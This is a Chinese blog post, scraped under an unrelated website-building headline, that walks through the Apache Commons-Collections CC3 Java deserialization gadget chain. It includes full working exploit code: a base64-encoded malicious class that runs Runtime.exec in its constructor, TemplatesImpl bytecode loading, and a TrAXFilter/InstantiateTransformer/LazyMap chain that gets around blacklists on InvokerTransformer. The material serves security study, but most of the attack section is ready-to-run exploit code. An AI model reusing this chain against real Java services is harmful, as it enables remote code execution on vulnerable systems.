当前位置：首页 > news >正文

漳州微网站建设价格宁波建设

news 2026/5/3 23:51:50

漳州微网站建设价格,宁波建设,wordpress 前端框架,263企业邮箱怎么注册一、原理CC1链中我们是通过调用Runtime.getRuntime.exec()来执行系统命令#xff0c;而另一个方向我们可以通过TemplatesImpl加载字节码的类#xff0c;通过调⽤其newTransformer() 方法#xff0c;即可执⾏这段字节码的类构造器#xff0c;我们在类构造器中加入恶意代码而另一个方向我们可以通过TemplatesImpl加载字节码的类通过调⽤其newTransformer() 方法即可执⾏这段字节码的类构造器我们在类构造器中加入恶意代码即可执行任意命令。二、分析构造1.CC1链在CC1链中我们的payload如下Transformer[] transformers new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer(exec, new Class[]{String.class}, new Object[]{calc}), }; ChainedTransformer chainedTransformer new ChainedTransformer(transformers); Map innerMap new HashMap(); Map outerMap TransformedMap.decorate(innerMap, null, chainedTransformer); outerMap.put(test, xxxx);2.TemplatesImpl动态加载我们用TemplatesImpl()动态加载字节码如下byte[] code Base64.getDecoder().decode(yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS); TemplatesImpl obj new TemplatesImpl(); setFieldValue(obj, _bytecodes, new byte[][] {code}); setFieldValue(obj, _name, test); setFieldValue(obj, _tfactory, new TransformerFactoryImpl());其中setFieldValue()的代码如下public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value); }其中base64中的内容为如下编译后base64出来的参考package com.TemplastesImplTest; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.io.IOException;public class codeTest extends AbstractTranslet {Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public codeTest() throws Exception{Runtime.getRuntime().exec(calc);} }3.transformers设置那么两个合并到一起就可以执行任意字节码只需要将第⼀个demo中InvokerTransformer执⾏的“⽅法”改成TemplatesImpl::newTransformer()Transformer[] transformers new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer(newTransformer, null, null) };4.则改造好的payload如下public class CC3 {public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {byte[] code Base64.getDecoder().decode(yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS);TemplatesImpl obj new TemplatesImpl();setFieldValue(obj, _bytecodes, new byte[][] {code});setFieldValue(obj, _name, test);setFieldValue(obj, _tfactory, new TransformerFactoryImpl());Transformer[] newTransformers new Transformer[]{new ConstantTransformer(obj),new InvokerTransformer(newTransformer, null, null)};ChainedTransformer chainedTransformer new ChainedTransformer(newTransformers);HashMap hashMap new HashMap();Map decorate TransformedMap.decorate(hashMap, null, chainedTransformer);decorate.put(test,test);} }三、ysoserial的CC3链分析1.背景2015年初frohoff和gebl发布了Talk《Marshalling Pickles: how deserializing objects will ruin your day》以及Java反序列化利⽤⼯具ysoserial随后引爆了安全界。开发者们⾃然会去找寻⼀种安全的过滤⽅法于是类似SerialKiller这样的⼯具随之诞⽣。SerialKiller是⼀个Java反序列化过滤器可以通过⿊名单与⽩名单的⽅式来限制反序列化时允许通过的类。在其发布的第⼀个版本代码中我们可以看到其给出了最初的⿊名单这个⿊名单中InvokerTransformer赫然在列也就切断了CommonsCollections1的利⽤链。有攻就有防ysoserial随后增加了不少新的Gadgets其中就包括CommonsCollections3。2.TrAXFilterCommonsCollections3的⽬的很明显就是为了绕过⼀些规则对InvokerTransformer的限制。CommonsCollections3并没有使⽤到InvokerTransformer来调⽤任意⽅法⽽是⽤到了另⼀个类com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter。这个类的构造⽅法中调⽤了(TransformerImpl) templates.newTransformer() 免去了我们使⽤InvokerTransformer⼿⼯调⽤newTransformer() ⽅法这⼀步3.InstantiateTransformer当然缺少了InvokerTransformerTrAXFilter的构造⽅法也是⽆法调⽤的。这⾥会⽤到⼀个新的Transformer就是org.apache.commons.collections.functors.InstantiateTransformer。InstantiateTransformer也是⼀个实现了Transformer接⼝的类他的作⽤就是调⽤构造⽅法。所以我们实现的⽬标就是利⽤InstantiateTransformer 来调⽤到TrAXFilter 的构造⽅法再利⽤其构造⽅法⾥的templates.newTransformer() 调⽤到TemplatesImpl ⾥的字节码。4.CommonsCollections3所以新构造的Transformer调用链如下Transformer[] newTransformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),new InstantiateTransformer(new Class[]{Templates.class},new Object[]{obj})};则重新改造的payload如下public class CC3 {public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {byte[] code Base64.getDecoder().decode(yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS);TemplatesImpl obj new TemplatesImpl();setFieldValue(obj, _bytecodes, new byte[][] {code});setFieldValue(obj, _name, test);setFieldValue(obj, _tfactory, new TransformerFactoryImpl());Transformer[] newTransformersnewfail new Transformer[]{new ConstantTransformer(1)};Transformer[] newTransformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),new InstantiateTransformer(new Class[]{Templates.class},new Object[]{obj})};ChainedTransformer chainedTransformer new ChainedTransformer(newTransformersnewfail);HashMap hashMap new HashMap();Map decorate LazyMap.decorate(hashMap, chainedTransformer);TiedMapEntry tme new TiedMapEntry(decorate, keykey);Map expMap new HashMap();expMap.put(tme, valuevalue);decorate.remove(keykey);Field f ChainedTransformer.class.getDeclaredField(iTransformers);f.setAccessible(true);f.set(chainedTransformer, newTransformers);ByteArrayOutputStream barr new ByteArrayOutputStream();ObjectOutputStream oos new ObjectOutputStream(barr);oos.writeObject(expMap);oos.close();ObjectInputStream objectInputStream new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));objectInputStream.readObject();} }

查看全文

http://www.hkea.cn/news/14521059/